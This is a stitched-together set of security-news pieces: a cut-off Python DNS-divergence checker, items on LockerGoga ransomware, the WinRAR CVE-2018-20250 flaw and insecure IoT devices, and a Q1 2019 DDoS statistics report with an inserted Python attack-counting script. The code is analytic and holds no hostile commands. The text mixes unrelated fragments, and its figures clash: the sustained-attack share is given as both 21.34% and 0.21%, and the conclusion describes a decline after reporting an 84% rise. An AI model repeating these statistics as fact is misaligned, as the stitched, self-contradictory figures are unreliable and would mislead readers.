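    public answer: a site served from several addresses still overlaps somewhere.
    """
    public = {name: a for name, a in answers.items() if name != "local"}
    divergent = {}
    for domain, local_ips in answers["local"].items():
        public_ips = {ip for a in public.values() for ip in a.get(domain, [])}
        if public_ips and not public_ips & set(local_ips):
            divergent[domain] = local_ips
    return divergent


def build_sample_response(domain: str, txid: int, ip: str) -> bytes:
    """Constructed reply (no network): one A record, name compressed to 0x0c."""
    question = build_query(domain, txid)[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton(ip)
    return header + question + answer


if __name__ == "__main__":
    # Constructed observations, not real data: the legitimate name resolves
    # locally to the lookalike's address, which both public resolvers deny.
    sample = {
        "local":      {"legit.example": ["198.51.100.7"], "lookalike.example": ["198.51.100.7"]},
        "google":     {"legit.example": ["203.0.113.10"], "lookalike.example": ["198.51.100.7"]},
        "cloudflare": {"legit.example": ["203.0.113.10"], "lookalike.example": ["198.51.100.7"]},
    }
    print(find_divergent(sample))   # {'legit.example': ['198.51.100.7']}
```

For a live check, gather `answers` with `query_a(domain, ip)` for the system resolver and for each entry of `PUBLIC_RESOLVERS`, then pass the result to `find_divergent`.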

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, of which around 220,000 included corporate customers.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult, took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. This was because of a privilege escalation vulnerability. The system failed to validate that the user had the appropriate permission to obtain admin control, so that an attacker with access to the watch’s credentials could change the permissions at the backend, gaining access to the account information and data stored on the watch.

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

DDoS attacks in Q1 2019

21 May, 2019 - 12:00

News overview

The start of the year saw the appearance of various new tools in the arsenal of DDoS-attack masterminds. In early February, for instance, the new botnet Cayosin, assembled from elements of Qbot, Mirai, and other publicly available malware, swam into view. Cybersecurity experts were intrigued less by the mosaic structure and frequent updating of its set of exploited vulnerabilities than by the fact that it was advertised (as a DDoS service) not on the dark web, but through YouTube. What’s more, it is up for sale on Instagram (botnetters are clearly making the most of the opportunities afforded by social media). In tracing the cybercriminals’ accounts, the researchers stumbled upon other malware and botnets as well, including the already discovered Yowai.

Mid-March turned up another find in the shape of a new version of Mirai, geared towards attacking business devices. The malware is now able to “botnetize” not only access points, routers, and network cameras, but wireless presentation and digital signage systems, too.

Despite all this, the number of observed high-profile attacks using new and not-so-new botnets was not that high. At the end of winter, the University of Albany (UAlbany) in the US came under assault: during the February 5 – March 1 period, 17 attacks were made on it, downing the university servers for at least five minutes. Data belonging to students and staff was not affected, but some services were unavailable; the head of IT security at UAlbany believes that the university was specifically targeted.

In early February, the website of the National Union of Journalists of the Philippines was also hit. The site was disabled for several hours by a series of powerful attacks, peaking at 468 GB/s of traffic. The attack was part of a widespread campaign against various news resources. The targets believe themselves to be the victims of political pressure on alternative sources of information.

Also in mid-March, Facebook encountered serious problems with its services when Facebook and Instagram users were unable to log into their accounts. Many observers consider the incident to be DDoS-related. However, Facebook itself rejects this version of events, meaning that the real cause can only be guessed at.

The lack of news about serious DDoS attacks coincided with a rise in the number of reports of major police operations against attack organizers, accompanied by arrests and charges.

The fight to bring down resources used for DDoS attacks continues: in early January, the US Department of Justice seized 15 Internet domains from which a series of DDoS attacks was launched last December. According to DoJ documents, those domains were used to carry out attacks on government systems, ISPs, universities, financial institutions, and gaming platforms worldwide.

Later that same month, a US court handed down a 10-year jail term to a Massachusetts hacker for conducting DDoS attacks against two health facilities. Also in January, a hacker-for-hire was arrested in Britain for having incapacitated mobile networks in Liberia and Germany (at the peak of his criminal career in 2015, he took the whole of Liberia offline). Although his “work history” is far longer than that, no other charges were brought.

The shockwaves from last year’s operation to close down Webstresser.org — one of the most notorious sites providing DDoS attack services — continue to spread. Cyber police decided to go after not just the attack organizers, but the customers as well. At the end of January, Europol announced the arrest of more than 250 users in Britain and the Netherlands. Instead of prison, one of the convicted cybercriminals will receive an alternative punishment under the Dutch Hack_Right program, aimed at rehabilitating young hackers arrested for the first time. Other sources report that an investigation is underway into all 150,000 Webstresser clients resident in 20 different countries.

Yet despite the law enforcement efforts, DDoS attacks remain a real threat to business. As a Neustar International Security Council survey of 200 senior technical staff members of large companies revealed, firms today consider DDoS attacks to be a serious problem: 52% of security services have already faced them, and 75% are concerned about the issue.

Quarter trends

Last quarter, we made two predictions about trends in the DDoS attack market: first, that the market overall would contract; second, that demand for long-term “smart” attacks, in particular HTTP flooding, would grow.

The first did not happen: Kaspersky DDoS Protection statistics show that all DDoS attack indicators increased last quarter. The total number of attacks climbed by 84%, and the number of sustained (over 60 minutes) DDoS sessions precisely doubled. The average duration increased by 4.21 times, while the segment of extremely long attacks posted a massive 487% growth.

This forces a reassessment of the assumption made in last year’s Q3 and Q4 reports that the decrease in DDoS activity is linked to cybercriminals switching to the more reliable and profitable cryptocurrency mining. Clearly, this hypothesis is at least partially wrong.

There is another, more likely explanation: over the last six months of the previous year, what we were observing was not so much the redistribution of botnet capacity to other purposes as the emergence of a market vacuum. Most likely, the supply deficit was linked to the clamping down on DDoS attacks, the closure of sites selling related services, and the arrest of some major players over the past year. Now it seems the vacuum is being filled: such explosive growth in the indicators is almost certainly due to the appearance of new suppliers and clients of DDoS services. It will be interesting to observe how this trend develops in Q2. Will the indicators continue to rise, or will the market settle at the current level?

The second prediction (growing demand for smart application-level attacks) was more accurate: the share of long, harder-to-organize attacks is still growing, both qualitatively and quantitatively. We see no reason why this trend should not continue throughout Q2.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2019.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
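The counting rules above, worked through as an added example that is not the report's own code: activity periods are merged into attacks under the 24-hour rule, separate botnets give separate attacks, and targets are counted by unique IP. The botnet names, addresses and timestamps are constructed; the 60-minute "sustained" cut follows the text, and the threshold is a parameter so the five-hour figure used later in the report can be reproduced too.

```python
"""Attack counting per the DDoS Intelligence methodology above (added example).
Periods of one botnet against one target merge into one attack while the gap
between them is under 24 hours; a gap of 24 hours or more, or a different
botnet, starts a new attack. Targets are counted by unique IP address.
"""
from collections import defaultdict
from datetime import datetime, timedelta

GAP = timedelta(hours=24)
SUSTAINED = timedelta(minutes=60)      # 'sustained' session as used in the text

Attack = tuple[str, str, datetime, datetime]   # (target_ip, botnet, start, end)


def count_attacks(periods: list[Attack]) -> list[Attack]:
    """Merge raw botnet activity periods into attacks under the 24-hour rule."""
    by_key: dict[tuple[str, str], list[tuple[datetime, datetime]]] = defaultdict(list)
    for target, botnet, start, end in periods:
        by_key[(target, botnet)].append((start, end))
    attacks: list[Attack] = []
    for (target, botnet), spans in by_key.items():
        spans.sort()
        cur_start, cur_end = spans[0]
        for start, end in spans[1:]:
            if start - cur_end < GAP:            # under 24 h: same attack, extend it
                cur_end = max(cur_end, end)
            else:                                # 24 h or more: a new attack
                attacks.append((target, botnet, cur_start, cur_end))
                cur_start, cur_end = start, end
        attacks.append((target, botnet, cur_start, cur_end))
    return attacks


def unique_targets(attacks: list[Attack]) -> int:
    """Unique targets are counted by IP address, as the report does."""
    return len({target for target, _, _, _ in attacks})


def share_longer_than(attacks: list[Attack], threshold: timedelta = SUSTAINED) -> float:
    """Fraction of attacks whose duration exceeds `threshold` (0.0 if none)."""
    if not attacks:
        return 0.0
    long_ones = sum(1 for _, _, s, e in attacks if e - s > threshold)
    return long_ones / len(attacks)


def longest_hours(attacks: list[Attack]) -> float:
    """Duration of the longest attack in hours (0.0 for an empty list)."""
    return max(((e - s).total_seconds() / 3600 for _, _, s, e in attacks), default=0.0)


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed activity periods, not DDoS Intelligence data.
SAMPLE_PERIODS: list[Attack] = [
    ("203.0.113.5", "botA", _t("2019-03-16 01:00"), _t("2019-03-16 03:00")),
    ("203.0.113.5", "botA", _t("2019-03-16 20:00"), _t("2019-03-17 02:00")),  # 17 h gap: same attack
    ("203.0.113.5", "botA", _t("2019-03-19 00:00"), _t("2019-03-19 00:30")),  # 46 h gap: new attack
    ("203.0.113.5", "botB", _t("2019-03-16 01:00"), _t("2019-03-16 01:20")),  # other botnet: separate
    ("198.51.100.9", "botA", _t("2019-03-20 10:00"), _t("2019-03-20 10:40")),
]

if __name__ == "__main__":
    attacks = count_attacks(SAMPLE_PERIODS)
    print(len(attacks), "attacks against", unique_targets(attacks), "targets")  # 4 attacks against 2 targets
    print(f"sustained share {share_longer_than(attacks):.2%}, longest {longest_hours(attacks):.1f} h")
```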

Quarter summary

  • In terms of the geographical distribution of attacks, China remains out in front. Having nearly surrendered top spot at the end of 2018, it consolidated its position in Q1 2019.
  • The geographical distribution of targets roughly mirrors the geographical distribution of attacks: the Top 3 were again China (59.85%), the US (21.28%), and Hong Kong (4.21%).
  • Both geographic Top 10s saw relatively little reshuffling compared to previous quarters. There was no repeat of the sudden growth in botnet activity in unexpected places.
  • DDoS attacks peaked in the second half of March; the quietest period was January.
  • The most dangerous day of the week for DDoS attacks was Saturday, while Sunday remains the calmest.
  • The maximum attack duration decreased by more than a day against the previous quarter, although the percentage share of sustained DDoS sessions continued to rise and amounted to 21.34% (versus 16.66% in Q4 2018).
  • The share of SYN flooding increased to 84%, bringing down the shares of UDP and TCP flooding, while the shares of HTTP and ICMP attacks rose to 3.3% and 0.6%, respectively.
  • The share of Linux botnets decreased slightly, but still remains predominant (95.71%).
  • Most botnet C&C servers are still located in the US (34.10%), with the Netherlands in second place (12.72%), and Russia in third (10.40%). It is notable that the once perennial leader, South Korea, returned to the Top 10, albeit in last place (2.31%).

Attack geography

China remains the leader by number of attacks. It even returned to its previous level after a drop in previous quarters: its share rose from 50.43% to 67.89%. In second place came the US, although its share was reduced from 24.90% to 17.17%. Third place belonged to Hong Kong, up from seventh, increasing its share from 1.84% to 4.81%.

Interestingly, except for China and Hong Kong, all other countries’ shares decreased. This did not prevent the US from retaining second position; meanwhile, Australia, having taken bronze at the end of 2018, dropped to last place, down 4 p.p. (from 4.57% to 0.56%).

Among other significant changes, it is worth noting Britain, which fell from fifth to seventh place having shed 1.52 p.p. (from 2.18% to 0.66%), as well as Canada and Saudi Arabia. Each of the latter two lost around 1 p.p., but that did not stop Canada (0.86%) climbing from sixth to fourth, while Saudi Arabia (0.58%) dropped down a rung towards the foot of the table.

Brazil, meanwhile, dropped out of the Top 10 altogether, making way for Singapore, which came straight in at number 5 with 0.82% of attacks (tellingly, its share too was down on the previous quarter, albeit very slightly).

South Korea, which previously juggled second and third place with the US, remains outside the Top 10 (accounting for 0.30% of attacks). However, although the Top 10 still looks slightly odd to us, there was no repeat of the out-of-the-blue changes observed in the past three quarters.

Distribution of DDoS attacks by country, Q4 2018 and Q1 2019

The results of the geographical distribution of targets are consistent with the geographical distribution of the attacks themselves: China is once again in first position (its share up from 43.26% to 59.85%), with the US in second (down from 29.14% to 21.28%) and Hong Kong in third (climbing from 1.76% to 4.21%).

Saudi Arabia dropped from fifth to sixth place, losing slightly more than 1 p.p. (its share decreased from 2.23% to 1.08%). Canada shed roughly the same amount (from 2.21% to 1.30%), yet rose from sixth to fourth place, while Britain’s more significant loss (from 2.73% to 1.18%) pushed it from fourth to fifth.

In the meantime, the Top 10 said goodbye to Australia and Brazil, which last quarter ranked third and eighth, respectively. They were replaced by Singapore, whose insignificant growth (from 0.72% to 0.94%) was enough to claim eighth place, and Poland, which saw its share nudge up from 0.33% to 0.90%, in ninth position. As before, the Top 10 was rounded off by Germany (0.77%).

Distribution of unique DDoS-attack targets by country, Q4 2018 and Q1 2019

Dynamics of the number of DDoS attacks

In the last quarter, the most DDoS activity was observed in March, especially the second half. The highest peak was on March 16 (699 attacks). And a significant surge occurred on January 17, when we registered 532 attacks. Early January was calm as expected, with no prominent spikes or troughs; however, the quietest day of all was February 5 with a total of 51 attacks.

Dynamics of the number of DDoS attacks in Q1 2019

As for the distribution by day of the week, activity last quarter clearly shifted to the weekend: Saturday was the most intensive day (accounting for 16.65% of attacks), with Friday in second place (15.39%). Sundays saw a relative lull — just 11.41% of attacks. Recall that in late 2018 Thursday had the largest share of DDoS attacks (15.74%), with Sunday again the most peaceful.

Distribution of DDoS attacks by day of the week, Q4 2018 and Q1 2019

Duration and types of DDoS attacks

In Q1, the share of sustained attacks almost doubled — from 0.11% to 0.21%. However, instead of lasting almost 14 days (329 hours) as in Q4 2018, the longest attack this quarter was just slightly more than 12 days (289 hours).

On top of that, the share of all attacks lasting more than five hours increased significantly: whereas at the end of 2018 it was 16.66%, now the figure stands at 21.34%. If this segment is sliced into smaller sections, as seen on the graph, most categories of long-duration attacks experienced a rise, while only the proportion of attacks lasting 100–139 hours decreased slightly (from 0.14% to 0.11%). Accordingly, the share of short-duration attacks fell by almost 5 p.p. to 78.66%.

Distribution of DDoS attacks by duration (hours), Q4 2018 and Q1 2019

As in previous years, SYN flooding made up the lion’s share of junk traffic in Q1. Compared to Q4 2018, its share was even greater, climbing to 84.1%. Naturally, such a large rise (up from 58.2%, more than 20 p.p.) had an impact on the shares of other types of traffic.

For instance, UDP flooding, despite holding on to second spot, had a Q1 share of just 8.9% (down from 31.1%). The share of TCP flooding, previously ranked third, also dropped (from 8.4% to 3.1%), only good enough for fourth place behind HTTP flooding (which grew by 1.1 p.p. to 3.3%). ICMP traffic finished last as per tradition, despite its share rising from 0.1% to 0.6%.

Distribution of DDoS attacks by type, Q1 2019

Linux botnets still vastly outnumber their Windows-based counterparts, although in Q1 2019 the gap closed slightly: Linux botnets now make up not 97.11% but 95.71% of the total, while the respective share of Windows botnets went up by approximately 1.5 p.p. to 4.29%. However, this is not because Windows devices are becoming more popular, but due to the declining number of C&C servers of the Mirai bot and its Darkai clone. As a result, the number of attacks by these bots decreased by three and seven times, respectively.

Ratio of Windows/Linux botnet attacks, Q4 2018 and Q1 2019

Botnet distribution geography

The leading country by number of botnets on its soil remains the US (34.10%). The Netherlands rose from third in Q4 2018 to second place (12.72%). Third place this time went to Russia (10.40%), which climbed all the way up from seventh. China (7.51%) rose from the foot of the ranking to fourth, just missing out on a return to the Top 3.

Greece and Germany, meanwhile, slipped out of the Top 10. They made room for Vietnam (4.05%) in seventh, and South Korea (2.31%). The latter only managed tenth place, despite previously having led this category for quite some time.

Distribution of botnet C&C servers by country, Q1 2019

Conclusion

In the previous three quarters, we saw some unexpected arrivals in several Top 10s — countries with no major track record as a source of DDoS threats suddenly asserted themselves. But Q1 2019 held no particular surprises, save for countries such as Saudi Arabia, the Netherlands, and Romania maintaining a high level of DDoS activity; in other words, their appearance in the Top 10s cannot be put down to random deviations. Meanwhile, cybercriminals previously based in South Korea seem to be in no hurry to reappear there. It is possible that we are witnessing the establishment of a new distribution of botnets by country.

Also worth noting is the significant decline in the botnet activity of Darkai, one of the Mirai clones: the number of attacks carried out with its assistance decreased by seven times. Mirai itself was also hit hard, suffering a threefold drop in activity. This factor, among others, goes some way to explaining a certain decline in the number and duration of DDoS attacks.